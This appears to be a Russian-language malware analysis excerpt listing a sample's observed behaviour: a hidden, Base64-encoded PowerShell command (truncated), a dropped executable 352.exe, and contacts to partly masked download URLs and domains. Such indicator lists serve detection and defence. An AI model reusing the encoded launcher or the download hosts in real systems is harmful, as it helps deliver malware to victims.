Техническая информация
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAG4AZABwAGMAegBzAGoAcgA9ACcAUgBiAHQAYgBiAHUAaQBhAG0AdwBiAG8AJwA7ACQAQgBrAHYAbgByAGwAagBsAGYAIAA9ACAAJwAzADUAMgAnADsAJABaAGYAeABpAHUAZQBoAHYAYgB2AD0AJwBaAGkAbwBsAG0AbgBpAHQAdAAnADsAJAB...
- %HOMEPATH%\352.exe
- %HOMEPATH%\352.exe
- http://www.yi###hou.com/wp-admin/aa753/
- http://ra#####rutbumn2019.com/cgi-bin/pg5/
- http://ra#####rutbumn2019.com/cgi-sys/suspendedpage.cgi
- DNS ASK yi###hou.com
- DNS ASK fb###unique.com
- DNS ASK li####.#levatevisual.com
- DNS ASK ra#####rutbumn2019.com
- DNS ASK wo####essdemo.site
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABXAG4AZABwAGMAegBzAGoAcgA9ACcAUgBiAHQAYgBiAHUAaQBhAG0AdwBiAG8AJwA7ACQAQgBrAHYAbgByAGwAagBsAGYAIAA9ACAAJwAzADUAMgAnADsAJABaAGYAeABpAHUAZQBoAHYAYgB2AD0AJwBaAGkAbwBsAG0AbgBpAHQAdAAnADsAJAB...' (со скрытым окном)